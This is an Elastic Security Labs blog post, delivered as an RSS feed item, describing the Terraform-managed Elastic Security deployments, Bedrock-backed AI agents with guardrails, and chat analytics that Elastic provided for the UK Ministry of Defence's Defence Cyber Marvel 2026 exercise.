<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Enablement</title>
        <link>https://www.elastic.co/kr/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Thu, 09 Apr 2026 18:35:00 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Enablement</title>
            <url>https://www.elastic.co/kr/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/kr/security-labs</link>
        </image>
        <copyright>© 2026. elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Elastic on Defence Cyber Marvel 2026: A Technical overview from the Exercise Floor]]></title>
            <link>https://www.elastic.co/kr/security-labs/elastic-defence-cyber-marvel</link>
            <guid>elastic-defence-cyber-marvel</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[An overview of the Elastic Security and AI infrastructure deployed to support the UK Ministry of Defence's flagship cyber exercise, Defence Cyber Marvel 2026.]]></description>
            <content:encoded><![CDATA[<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image1.png" alt="" /></p>
<p>Where to begin. For the fourth consecutive year, Elastic has had the privilege of serving as a trusted industry partner on Exercise Defence Cyber Marvel - the UK Ministry of Defence's flagship cyber exercise series. DCM26 was, without question, the most ambitious iteration yet, and we're chuffed to bits to finally be able to talk about what we built, how we built it, and what we learnt along the way.</p>
<h2>What is Defence Cyber Marvel?</h2>
<p>For those unfamiliar, Defence Cyber Marvel (DCM) is the largest UK military cyber exercise series that focuses on defending traditional IT networks, corporate environments, and complex industrial control systems in realistic, high-pressure scenarios. It showcases responsible cyber power whilst enhancing readiness, interoperability, and resilience across Defence and allied nations. Now in its fifth year, DCM has evolved from an Army Cyber Association initiative into a tri-service operation led by Cyber and Specialist Operations Command (CSOC).</p>
<p>The <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government published an official press release for DCM26</a>, which provides an excellent overview of the exercise's strategic importance. As the British High Commissioner to Singapore noted, the exercise demonstrates the deep cooperation between the UK and trusted partners, a reminder of the strength of shared strategic partnerships in an increasingly complex security landscape.</p>
<p>At its core, DCM is a force-on-force cyber exercise: defending Blue Teams protect their assigned networks and infrastructure from attacking Red Teams, using a range of techniques. Activities span changing default passwords and hardening firewalls through to deploying enterprise-grade, AI-powered cyber defence with <a href="https://www.elastic.co/kr/security">Elastic Security</a>. The activities of each team are monitored by the White Team to establish a score factoring in system availability, attack detection, incident reporting, and system restoration.. It stretches the most experienced teams whilst also facilitating a unique training mechanism for junior teams on their first exposure to a cyber range, and that dual purpose is what makes DCM such a valuable exercise.</p>
<h2>The scale of DCM26</h2>
<p>DCM26 brought together over 2,500 personnel from 29 participating countries and 70 organisations, coordinated from a central Exercise Control (EXCON) based out of Singapore, with EXCON hosting over 600 participants. The exercise ran across a hybrid compute environment spanning the CR14 cyber range and AWS, hosting over 5,000 virtual systems.</p>
<p>The exercise itself ran for five days of execution (9–13 February 2026), preceded by optional instructor-led pre-training and connectivity checks. The scenario, built on the Defence Academy Training Environment (DATE) Indo-Pacific Operating Environment, placed teams as Cyber Protection Teams defending deployed military systems during an escalating regional crisis.Blue Teams were geographically dispersed,some in their home locations across the UK and internationally, others deployed overseas, all connecting into the range via VPN.</p>
<p>Participants included representatives from UK Defence, cross-government departments such as the National Crime Agency, the Department for Work and Pensions, the Cabinet Office, and the Department for Business and Trade, alongside international partners forming up to 40 teams. Following the success of last year's exercise in the Republic of Korea, Singapore served as the exercise hub for the first time, reflecting the UK's commitment to deepening cooperation with Indo-Pacific partners on shared security challenges.</p>
<p>In short, it's a serious exercise. High-pressure, force-on-force, with real consequences for scoring and real learning outcomes for every participant.</p>
<h2>The deployments: Our Elastic infrastructure</h2>
<p>This year's infrastructure represented a significant architectural evolution from previous iterations. Rather than deploying individual Elastic Cloud clusters per team, we moved to a single, space-based multi-tenanted Elastic Cloud deployment for the Blue Teams. We also provided deployments for functions outside of  the Blue Teams. Let me break down each deployment and why it exists.</p>
<h3>Blue Teams: Multi-tenanted Elastic Security</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image4.png" alt="" /></p>
<p>The centrepiece of our contribution was a single Elastic Cloud deployment serving all 40 defending Blue Teams, separated using Kibana Spaces and datastream namespaces. Each of the 39 teams had its own isolated workspace, including dashboards, agents, and detection rules.</p>
<p>Here's what the Terraform resource looked like for creating each team's space:</p>
<pre><code># Create 40 Blue Team spaces
resource &quot;elasticstack_kibana_space&quot; &quot;blue_team&quot; {
  count = var.team_count

  space_id    = local.space_ids[count.index]
  name        = &quot;Blue Team ${local.team_numbers[count.index]}&quot;
  description = &quot;Isolated space for BT-${local.team_numbers[count.index]} with space-aware Fleet visibility&quot;

  disabled_features = []
  color             = &quot;#0077CC&quot;
}
</code></pre>
<p>Each team's space got a dedicated set of three  <a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy">Fleet</a> agent policies: on day 1a Deployed network policy, day 2, a Host Nation network policy, and finally a PacketCapture policy for network traffic monitoring. The phased access control was elegant in its simplicity: setting <code>enable_hostnation_network = true</code> in our <code>terraform.tfvars</code> and running <code>terraform apply</code> expanded each team's role permissions and made their Host Nation agent policy visible in their space. The exercise went from one network to two without a single manual click in Kibana.</p>
<p>The data isolation relied on datastream namespaces. Each agent policy is written to team-specific namespaces like <code>bt_01_deployed</code> and <code>bt_01_hostnation</code>, producing data streams following the pattern:</p>
<pre><code>logs-system.auth-bt_01_hostnation
logs-system.syslog-bt_01_hostnation
metrics-system.cpu-bt_01_hostnation
logs-endpoint.events.process-bt_01_hostnation
logs-windows.forwarded-bt_01_hostnation
logs-auditd.log-bt_01_hostnation
</code></pre>
<p>Each team's Kibana security role was then scoped to only those data streams using dynamic index privilege blocks:</p>
<pre><code># Deployed data streams (always granted)
indices {
  names = [
    &quot;logs-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;metrics-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;.fleet-*&quot;
  ]
  privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
}

# HostNation data streams (conditional on enable_hostnation_network)
dynamic &quot;indices&quot; {
  for_each = var.enable_hostnation_network ? [1] : []
  content {
    names = [
      &quot;logs-*-${local.hostnation_namespaces[count.index]}&quot;,
      &quot;metrics-*-${local.hostnation_namespaces[count.index]}&quot;
    ]
    privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
  }
}
</code></pre>
<p>Authentication was handled via Keycloak SSO, with Elasticsearch role mappings connecting Keycloak groups to Kibana roles:</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_role_mapping&quot; &quot;blue_team&quot; {
  count = var.team_count

  name    = &quot;bt-${local.team_numbers[count.index]}-keycloak-mapping&quot;
  enabled = true

  roles = [
    elasticstack_kibana_security_role.blue_team[count.index].name
  ]

  rules = jsonencode({
    field = {
      groups = &quot;${local.keycloak_groups[count.index]}&quot;
    }
  })
}
</code></pre>
<p>The default integration policies were simple by design. Each team received: System for core OS telemetry, Elastic Defend for Endpoint Detection and Response, Windows event forwarding, Auditd for Linux audit logging, and Network Packet Capture integrations. That's over 400 integration policies managed as code via the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a>.</p>
<p>A note on Elastic Defend: due to the effectiveness of Elastic's endpoint protection - which is trusted in production by the <a href="https://www.elastic.co/kr/blog/defense-and-intelligence-community-endpoint-security">US DOD and IC, read more about that here</a> - and the fact that nobody in their right mind is burning zero-day exploits on a training exercise, we're forced tohandicap Elastic Defend by disabling Prevent mode, leaving it in Detect-only mode. Teams get alerts when something malicious happens, but with no automatic mitigation. We also completely disable Memory Threat Prevention and Detection as this discovers the majority of attacking team implants and beacons, which would rather spoil the game for the Red Teams. Toward the end of the exercise, we allowed the teams the freedom to use Elastic Defend to its full capability, but not before letting the Red Teams get a strong foothold.</p>
<p>We also pre-installed Elastic's <a href="https://www.elastic.co/kr/docs/reference/security/prebuilt-rules">prebuilt detection rules</a> into each team space - the full set from Elastic Security Labs, continuously updated in an open repository. These rules were setup to ensure they only queried indices that the team's namespace-scoped permissions allowed, preventing any cross-team data leakage in detection rule execution.</p>
<p>Additionally, each team space had its Security Solution default index configured to scope detection rules to only that team's data streams, rather than the default broad pattern. This was handled by a Terraform <code>null_resource</code> that called the Kibana internal settings API to set <code>securitySolution:defaultIndex</code> for each space.</p>
<p>At peak, this deployment was ingesting 800,000 events per second (EPS) across all 40 teams. That's a serious amount of data, and the cluster handled it comfortably thanks to the autoscaling capabilities of Elastic Cloud. <a href="https://www.elastic.co/kr/blog/monitoring-petabytes-of-logs-at-ebay-with-beats">That given, back in 2018 we were doing 5 million events per second with eBay.</a></p>
<p>Data lifecycle was managed by an Index Lifecycle Management (ILM) policy that rolled indices over after one day or <code>50</code> GB (whichever came first), moved them to a warm phase after two days for read-only optimisation and force-merging, and then deleted data after ten days. As a result, the storage costs were minimized while maintaining the exercise window requirements. Below is an example of how the ILM policy was implemented.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_index_lifecycle&quot; &quot;dcm5_10day_retention&quot; {
  name = &quot;dcm5-10day-retention&quot;

  hot {
    min_age = &quot;0ms&quot;

    set_priority {
      priority = 100
    }

    rollover {
      max_age                = &quot;1d&quot;
      max_primary_shard_size = &quot;50gb&quot;
    }
  }

  warm {
    min_age = &quot;2d&quot;

    set_priority {
      priority = 50
    }

    readonly {}

    forcemerge {
      max_num_segments = 1
    }
  }

  delete {
    min_age = &quot;${var.data_retention_days}d&quot;

    delete {
      delete_searchable_snapshot = true
    }
  }
}
</code></pre>
<h3>The shard stress test: Proving multi-tenancy at scale</h3>
<p>Before committing to this architecture for a live military exercise, we needed to prove it would be able to meet our requirements and have an appropriate failover in place in the event of issues. Moving from individual deployments to a single multi-tenanted cluster introduced real risks: resource contention, ingest bottlenecks, data leakage across spaces due to misconfiguration, large TCP connection counts on the Elasticsearch nodes, and a significantly larger shard count since each team generates its own set of indices.</p>
<p>So we built a dedicated testing rig. The plan was straightforward: deploy 50 Kibana Spaces, create an agent policy in each space, launch 6,000 EC2 instances (120 per tenant, across six subnets in three availability zones), and load-test the lot. We monitored everything with AutoOps and Stack Monitoring.</p>
<p>The deployment flow worked like this: Terraform created the VPC and subnets across three availability zones, provisioned the 50 Kibana Spaces and their space-scoped Fleet policies, generated enrolment tokens, and then launched EC2 instances in batches. Each instance installed Elastic Agent on boot and enrolled against its space-specific token.</p>
<p>We hit some interesting challenges along the way. The standard Elastic Stack Terraform Provider didn't support space-aware Fleet operations at the time, so we forked it and added space ID handling to the Fleet resources - without that modification, every agent would have enrolled into the default space regardless of policy assignment. This wasn't the first time we'd had to extend the provider for an exercise; two years ago, for DCM2, we'd added the <code>elasticsearch_cluster_info</code> data source. Fortunately, the upstream provider has since added <code>support for space_ids</code> in version <code>0.12.2</code>.</p>
<p>We also ran into AWS EC2 API rate limits when trying to spin up all 6,000 instances simultaneously, so we batched deployments at 500 instances with five-minute cool-off periods between batches.</p>
<p>The results were reassuring. All 6,000 agents were typically enrolled within 20 minutes of deployment. In our tests, space isolation worked as expected with no observed data leakage between tenants. Fleet policy updates propagated to all agents within 60 seconds. Search queries scoped to individual spaces remained fast under full load. And the multi-AZ distribution proved resilient during simulated availability zone failures.</p>
<p>This testing gave us the confidence to commit to the architecture for the live exercise.</p>
<h3>Red Teams: C2 implant observability</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image3.png" alt="" /></p>
<p>A separate, dedicated Elastic deployment was stood up for the Red Teams, focused on Command and Control (C2) implant observability. This gave the attacking teams visibility into their own operations, including implant status, beacon callbacks, and operational progress, without any risk of cross-pollination with the Blue Team's data. The Red Teams used Tuoni as their C2, which is a framework developed by Clarified Security for red teaming. In DCM3, we worked with Clarified Security to ensure it properly supported the Elastic Common Schema, making future integration with Elastic much easier.</p>
<h3>NSOC: Exercise Network Security Operations Centre</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image6.png" alt="" /></p>
<p>The core exercise, Network Security Operations Centre (NSOC), ran on its own Elastic deployment, providing the exercise control staff with an overarching view of range health, security monitoring across the entire infrastructure, and critically, audit logging for all the AI services we deployed. Every <a href="https://www.elastic.co/kr/docs/reference/integrations/aws_bedrock">Bedrock API invocation was logged in CloudWatch</a> and observable in this deployment, meaning the NSOC had complete visibility into what was being asked to the AI agents and by whom . More on this in the AI section below.</p>
<h2>Infrastructure automation: Terraform and Catapult</h2>
<p>Everything you've seen above was managed as Infrastructure as Code. Our <code>provider.tf</code> gives a sense of the provider ecosystem we were orchestrating:</p>
<pre><code>terraform {
  required_version = &quot;&gt;= 1.5&quot;

  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.13.1&quot;
    }
    aws = {
      source  = &quot;hashicorp/aws&quot;
      version = &quot;~&gt; 5.0&quot;
    }
    vault = {
      source  = &quot;hashicorp/vault&quot;
      version = &quot;~&gt; 3.20&quot;
    }
    cloudflare = {
      source  = &quot;cloudflare/cloudflare&quot;
      version = &quot;~&gt; 5.15.0&quot;
    }
  }

  backend &quot;s3&quot; {
    bucket  = &quot;elastic-terraform-state-dcm5&quot;
    key     = &quot;prod/terraform.tfstate&quot;
    region  = &quot;eu-west-2&quot;
    encrypt = true
  }
}
</code></pre>
<p>The total resource footprint managed by Terraform was substantial: one Elastic Cloud deployment with autoscaling, 40 Kibana Spaces, 120 Fleet agent policies (three per team), 400+ integration policies, 40 Kibana security roles, 40 Keycloak role mappings, ILM policies for data retention, 41 AWS IAM users for Bedrock GenAI connectors (one per team space plus a default), 41 Kibana GenAI action connectors, AWS Bedrock guardrails, Cloudflare Zero Trust tunnels for Tines access, Tines action connectors per team space, detection service accounts stored in HashiCorp Vault, and per-space Security Solution default index configuration. All state was stored in an encrypted S3 backend.</p>
<p>For the agent and proxy deployment onto the actual range systems, we used <a href="https://github.com/ClarifiedSecurity/catapult">Catapult</a>, an excellent open-source tool built by the team at Clarified Security. Catapult wraps Ansible with a container-based execution model that's purpose-built for cyber range deployments. It handled the installation and enrolment of Elastic Agents across the range infrastructure. The configuration of proxy servers (each team had a dedicated Squid proxy for its deployed network, this was to simulate a single point of egress as it would be in the real world. Traffic was routing through endpoints like <code>http://elastic-proxy.dsoc.XX.dcm.ex:3128</code>), and the deployment of Cloudflare tunnels for Tines connectivity.</p>
<p>During provisioning, the following were written to  HashiCorp Vault by Terraform and consumed by Catapult: Credentials, enrolment tokens, API keys, proxy configurations, Tines service account credentials.. The Vault paths followed a consistent structure like <code>dcm/gt/elastic/prod/enrollment_tokens/BT-XX-Deployed</code> and <code>dcm/gt/elastic/tines-sa/tines-sa-btXX</code>, making it straightforward for the Catapult playbooks to pull the right credentials for each team.</p>
<h2>Training: setting teams up for success</h2>
<p>Deploying the platform is one thing; ensuring people can actually use it is another. We provided on-range, instructor-led training to the Blue Teams during the pre-exercise phase. This covered <a href="https://github.com/ClarifiedSecurity/catapult">Elastic Security</a> fundamentals, navigating their team space in Kibana, working with the prebuilt detection rules, using Discover for log analysis and threat hunting, building custom dashboards, understanding Elastic Defend alerts, and getting familiar with the Timeline investigation tool.</p>
<p>The exercise instruction itself noted this training was optional but &quot;highly recommended,&quot; and from what we saw, the teams who attended absolutely hit the ground running on Day one of execution. Training and enablement are just as important as the technology deployment itself. Handing a team enterprise-grade security tooling which they don't know how to use would'nt have been helpful for anyone.</p>
<h2>The On-Range AI service: Compliant, audited, Guardrailed</h2>
<p>This year marked our debut in providing AI access to the DCM range. We provided a compliant AI service directly on the range, backed by UK-tenanted AWS Bedrock models - specifically Claude 3.7 Sonnet running in the eu-west-2 (London) region. This wasn't AI for the sake of AI; it was a carefully architected service with guardrails, complete audit logging, and RBAC-aware access controls. We were trusted with running this service due to Elastic's experience in the AI space.</p>
<p>The AI service had multiple consumers on the range, and this is an important distinction. The compliant Bedrock connector we provisioned into each team's space wasn't just powering our custom agents - it also powered Elastic's native AI features, specifically:</p>
<h3>Elastic AI Assistant for Security</h3>
<p>The <a href="https://www.elastic.co/kr/docs/solutions/security/ai/ai-assistant">Elastic AI Assistant</a> was available in every Blue Team space, connected to our on-range Bedrock connector. This gave teams a context-aware chat interface directly within Elastic Security where they could ask questions about their alerts, get help writing ES|QL queries, investigate suspicious processes, and get guided remediation steps. The AI Assistant uses Retrieval-Augmented Generation (RAG) with Elastic's Knowledge Base feature, which is pre-populated with articles from <a href="https://www.elastic.co/kr/security-labs">Elastic Security Labs</a>. Teams could also add their own documents, such as range-specific SOPs, threat intel, or team notes, to the Knowledge Base to further ground the assistant's responses in their operational context.</p>
<p>What made this particularly valuable in the exercise context was the AI Assistant's ability to help less experienced analysts understand what they were looking at. A junior analyst facing their first live implant beacon could ask the assistant to explain the alert, suggest investigation steps, and even help draft the incident report. The data anonymisation settings ensured that sensitive field values could be obfuscated before being sent to the LLM provider.</p>
<h3>Elastic Attack Discovery</h3>
<p><a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> was another significant consumer of our on-range AI service. Attack Discovery uses LLMs to analyse alerts in a team's environment and identify threats by correlating alerts, behaviours, and attack paths. Each &quot;discovery&quot; represents a potential attack and describes relationships among multiple alerts - telling teams which users and hosts are involved, how alerts map to the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/mitre-attack-coverage">MITRE ATT&amp;CK matrix</a>, and which threat actor might be responsible.</p>
<p>For a cyber exercise in which Red Teams actively launched coordinated attacks, Attack Discovery was transformative. Instead of manually triaging hundreds of individual alerts, Blue Teams could run Attack Discovery to surface the high-level attack narratives, for example, &quot;these 15 alerts are all part of a lateral movement chain from host X to host Y, likely by threat actor Z&quot;, and focus their investigation time where it mattered most. It's the kind of capability that directly reduces mean time to respond, and fights alert fatigue, which is precisely what you need when you're under sustained attack for five days straight.</p>
<h2>The custom AI agents: Elastic Agent Builder</h2>
<p>Beyond the native Elastic AI features, we built three bespoke AI agents using <a href="https://www.elastic.co/kr/elasticsearch/agent-builder">Elastic Agent Builder</a>. Agent Builder is Elastic's framework for building custom AI agents that combine LLM instructions with modular, reusable tools, each tool being an ES|QL query, a built-in search capability, workflow execution, or an external integration via MCP. Agents parse natural language requests, select the appropriate tools, execute them, and iterate until they can provide a complete answer, all while managing context with data inside Elasticsearch. You can read more about the framework in the <a href="https://www.elastic.co/kr/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder documentation</a> and the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-ai-agent-builder-context-engineering-introduction">Elasticsearch Labs deep dive</a>.</p>
<p>The three key components of Agent Builder that we leveraged were:</p>
<p><strong>Agents:</strong> Custom LLM instructions and a set of assigned tools that define the agent's persona, capabilities, and behaviour boundaries. Each agent has a system prompt that controls its mission, the tools it can access, and the structure of its responses.</p>
<p><strong>Tools:</strong> Modular functions that agents use to search, retrieve, and manipulate Elasticsearch data. We built custom ES|QL tools that queried specific indices containing exercise documentation, playbooks, and reports.</p>
<p><strong>Agent Chat:</strong> The conversational interface - both the built-in Kibana UI and the programmatic API - that participants used to interact with the agents.</p>
<p>Agent and tool configurations are defined as JSON and managed via the Agent Builder APIs, making the entire agent lifecycle - from prompt engineering to tool binding - reproducible and version-controllable. We'll share the GrantPT agent configuration and tool definitions in a follow-up post for those who want to replicate this approach - watch this space.</p>
<p>Here's what each agent did:</p>
<h3>1. GrantPT - The general-purpose assistant</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image5.png" alt="" /></p>
<p>Available to all ~2,500 exercise participants, GrantPT was our primary AI agent and the best demonstration of how straightforward Agent Builder makes it to stand up a capable, domain-specific assistant. The agent's configuration consisted of a JSON object defining its system prompt, persona, and an array of bound tool IDs - that's it. No custom application code, no bespoke API layer, just declarative configuration.</p>
<p>What gave GrantPT its depth was the tooling. We defined a mix of built-in platform tools and custom ES|QL tools, each registered with a description, a parameterised query, and typed parameter definitions. For example, the knowledge base tool accepted a <code>target_index</code> and a semantic <code>query</code> parameter, executing a parameterised ES|QL query against our <code>dcm5-grantpt-*</code> indices with semantic search ranking:</p>
<pre><code>FROM dcm5-grantpt-* METADATA _score, _index
| WHERE _index == ?target_index
| WHERE content: ?query
| SORT _score DESC
| LIMIT 10
</code></pre>
<p>A separate index discovery tool let the agent dynamically enumerate available knowledge base indices at the start of each conversation, meaning we could add new documentation indices during the exercise without reconfiguring the agent; it would simply discover them on the next interaction.</p>
<p>We also built a Jira integration tool that performed semantic search across ingested helpdesk tickets, enabling GrantPT to surface relevant troubleshooting context from prior support requests. This was particularly useful for the HelpDesk Analysts, who could ask GrantPT about recurring issues and get responses grounded in actual ticket history rather than generic guidance.</p>
<p>The RBAC-tailored response behaviour came from a combination of the agent's system prompt, which instructed it to contextualise answers based on the user's role, and the underlying Elasticsearch security model. Because each tool's ES|QL query is executed within the user's security context, the agent can only surface documents accessible to the user's role. A Blue Team member asking about exercise procedures would get results scoped to their team's accessible indices, whilst a HelpDesk Analyst would see results from helpdesk-specific indices. The agent didn't need explicit role-switching logic; Elasticsearch's native document-level security handled scoping, and the agent simply worked with whatever results were returned. This is one of the things that makes Agent Builder genuinely elegant - by inheriting Elasticsearch's security model, you get RBAC-aware AI without writing a single line of authorisation code.</p>
<h3>2. REDRock - The adversary's companion</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image7.png" alt="" /></p>
<p>This agent was exclusively available to Red Teams. REDRock followed the same Agent Builder pattern, a dedicated system prompt defining its adversarial persona, bound to its own set of custom ES|QL tools querying Red Team-specific indices. These indices contained the Red Team playbooks, Tuoni C2 documentation, known system vulnerabilities within the range environment, and information about deployed services. The tool definitions mirrored the same parameterised semantic search pattern used by GrantPT, but were scoped to indices accessible only to Red Team roles. Red Team operators could query attack vectors, check for known weaknesses in target systems, and get contextual guidance on their operational plans. It was, quite frankly, like giving the attackers an extremely well-briefed operations officer.</p>
<h3>3. RefPT - The referee's tool</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image2.png" alt="" /></p>
<p>Built specifically for the White Team (the exercise referees and assessors), RefPT was bound to tools querying indices containing Blue Team reports, scenario events, and the scoring criteria. Its purpose was to ensure uniform and fair scoring across all 40+ teams. The agent's system prompt was tuned to cross-reference submitted reports against known scenario events and scoring rubrics, helping assessors identify inconsistencies or gaps. When you've got assessors evaluating dozens of teams simultaneously, having an AI that can correlate reports against a structured scoring index is genuinely transformative for consistency.</p>
<h3>Tines: AI-powered workflow automation</h3>
<p>Tines was also a consumer of the on-range AI service. Each Blue Team had a dedicated Tines instance, with Tines action connectors provisioned in their Kibana space. Tines could leverage the Bedrock-backed AI capabilities for intelligent workflow automation, such as automated alert enrichment, AI-assisted triage decisions, natural-language summaries in notification workflows, and natural-language workflow creation. The Tines connector was configured per-team with credentials stored in Vault:</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;tines_bt&quot; {
  count = var.team_count

  name              = &quot;BT-${local.team_numbers[count.index]}-Tines&quot;
  connector_type_id = &quot;.tines&quot;
  space_id          = local.space_ids[count.index]

  config = jsonencode({
    url = &quot;https://tines.dsoc.${local.team_numbers[count.index]}.dcm.ex/&quot;
  })
}
</code></pre>
<h3>Ensuring compliance: Guardrails and audit</h3>
<p>Every AI interaction across all of these consumers was governed by strict AWS Bedrock Guardrails. We deployed guardrails with content filtering (hate, insults, sexual content, and violence at MEDIUM thresholds), PII protection (blocking email addresses, phone numbers, names, addresses, UK National Insurance numbers, credit card numbers, and IP addresses), topic-based filtering to prevent discussion of actual classified operations, and profanity filtering. Here's a snippet of the guardrail configuration from our Terraform:</p>
<pre><code>resource &quot;aws_bedrock_guardrail&quot; &quot;dcm5_elastic&quot; {
  name        = &quot;dcm5-prod-elastic-guardrail&quot;
  description = &quot;Guardrails for DCM5 Prod Elastic Kibana GenAI connectors&quot;

  content_policy_config {
    filters_config {
      input_strength  = &quot;MEDIUM&quot;
      output_strength = &quot;MEDIUM&quot;
      type            = &quot;HATE&quot;
    }
    # ... additional content filters for INSULTS, SEXUAL, VIOLENCE
  }

  sensitive_information_policy_config {
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;UK_NATIONAL_INSURANCE_NUMBER&quot;
    }
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;IP_ADDRESS&quot;
    }
    # ... additional PII filters
  }

  topic_policy_config {
    topics_config {
      name       = &quot;classified-information&quot;
      definition = &quot;Discussions about actual classified operations, current real-world military activities, or operational intelligence.&quot;
      type       = &quot;DENY&quot;
    }
  }
}
</code></pre>
<p>Each Blue Team space had its own IAM user for Bedrock access, and the <code>genAiSettings:defaultAIConnectorOnly</code> Kibana setting was enforced to prevent teams from configuring their own connectors. This meant every single API call could be traced back to a specific team via CloudWatch, and the NSOC had complete audit visibility. The CloudWatch log group <code>/aws/bedrock/grantpt-prod/invocations</code> captured every invocation and guardrail event.</p>
<p>The numbers for all AI consumers speak for themselves: 3 custom AI Agents, 2,797 conversations, and 785 million AI tokens consumed throughout the exercise.</p>
<h2>In-game real-time monitoring</h2>
<p>Within the exercise scenario, each team had access to RocketChat as their on-range messaging client. Every Blue Team got its own channel, the ability to direct message anyone in the exercise, and the freedom to spin up new channels as needed. Most critically for DCM tradition, this included the memes channel - the spiritual backbone of all inter-team ribbing and the creative morale-boosting humour that inevitably emerges when you put a few thousand cyber operators under pressure for a week.</p>
<p>All of this communication data represented a brilliant real-time window into range health, team sentiment, and the topics trending across the exercise. It felt too good to pass up, so we ingested the entire RocketChat conversation corpus into Elastic in real time and put it to work.</p>
<h3>Sentiment analysis and named entity recognition</h3>
<p>For named entity recognition, we deployed the <a href="https://huggingface.co/dslim/bert-base-NER">dslim/bert-base-NER</a> model from Hugging Face into a machine learning node on the NSOC deployment using the <a href="https://www.elastic.co/kr/guide/en/elasticsearch/client/eland/current/index.html">Elastic ELAND client</a>. This was then wired into an Elasticsearch ingest pipeline that every RocketChat message passed through on ingestion. We took the extracted entities and surfaced the most common ones as dashboard themes, giving us a live view of the ebb and flow of conversation topics throughout the exercise.</p>
<p>We also analysed group activity, user statistics, and general communication patterns to build a picture of life patterns for each team - most active participants, message volume over time, and sentiment trends pivoted by individual users. All told, it gave us some genuinely interesting insight into what was happening on the range in near real time. When we switched Elastic Agent into Prevent mode, for instance, a word cloud on our dashboard immediately lit up with &quot;Elastic&quot; as the most discussed theme across all channels - Blue Teams discussing its effectiveness, Red Teams lamenting their lost beacons. Rather satisfying, that.</p>
<h3>Meme analysis (yes, really)</h3>
<p>Finally - and this one raised a few eyebrows - we pulled every meme submitted to the channels, vectorised the images, and ran nearest-neighbour evaluations to cluster similar memes and topics together. We also passed them through the zero-shot NER inference model to generate thematic descriptions of each meme's content. The logic was that these outputs might prove useful later for filtering, moderation, or other in-game interactions. Whether the meme analysis yielded operationally critical intelligence is debatable. Whether it was good fun is not.</p>
<h2>Nipping problems in the bud</h2>
<p>As much as we hoped everything would run smoothly during exercise week, things inevitably break, aren't fully understood, or need further customisation to suit how a particular team wants to use them. For this, we had our own subsection of the in-range helpdesk where Elastic and GenAI-specific requests could be raised by any team.</p>
<p>We manned this helpdesk for the entire duration of the exercise, providing guidance, documentation, issue debugging, and range-specific recommendations. That last point is worth expanding on. Sometimes, what a Blue Team was seeing in Elastic wasn't actually an Elastic problem at all, but rather Elastic faithfully surfacing something on the range that warranted further investigation (Red Teams can cause absolute mayhem, and the telemetry doesn't lie). Over the course of the exercise, we covered 125 individual support requests from teams specifically asking for help from us at Elastic.</p>
<h3>Pre-emptive debugging with Tines</h3>
<p>Beyond visiting teams via VTC or in person at EXCON, we also worked with <a href="https://www.tines.com/partners/elastic-security/">Tines</a> to try something a bit more proactive. We pulled the ticket body from incoming requests, attempted to categorise the problem, ran the categorisation against our corpus of previously resolved tickets, and had GenAI produce a summarised first-pass response aimed at solving the user's issue before triage brought it to our queue.</p>
<p>This is actually a pattern we borrowed from our own <a href="https://www.elastic.co/kr/blog/elastic-wins-2025-best-use-of-ai-for-assisted-support">support organisation at Elastic</a>, where we provide a similar capability using our extensive knowledge base of previously solved issues as a repository for supporting AI Agent context. The idea is straightforward: use past solutions to give a machine-generated, informed first stab at resolving a problem, and short-circuit the need for a support engineer to pick up every ticket manually. It didn't solve everything; some issues genuinely needed a human with range context, but it meaningfully reduced the queue pressure and got faster answers to the teams who needed them. This was such a success with our own specific tickets and queue that we actually extended the remit to the entire helpdesk in the latter part of the exercise, helping to reduce the load on the other groups in the Green team supporting the exercise.</p>
<h2>Industry partnerships: Better together</h2>
<p>One of the things we're most proud of is how our partnership ecosystem has grown year on year. DCM is not just an Elastic show; it's a genuine coalition of industry partners, each bringing something unique to the security platform.</p>
<p><strong>Year 1 (DCM2)</strong> - Elastic joined as an industry partner, providing the security monitoring and endpoint detection platform.</p>
<p><strong>Year 2 (DCM3)</strong> - We brought in Endace, providing 1:1 packet capture capability. Full packet capture alongside Elastic's network visibility gave teams the ability to conduct deep-dive forensics that log-based analysis alone can't provide.</p>
<p><strong>Year 3 (DCM4)</strong> - Tines joined the family, bringing workflow automation to the table. Blue Teams could now build automated response playbooks, triage workflows, and notification chains, all integrated directly into their Elastic environment via the native Tines connector.</p>
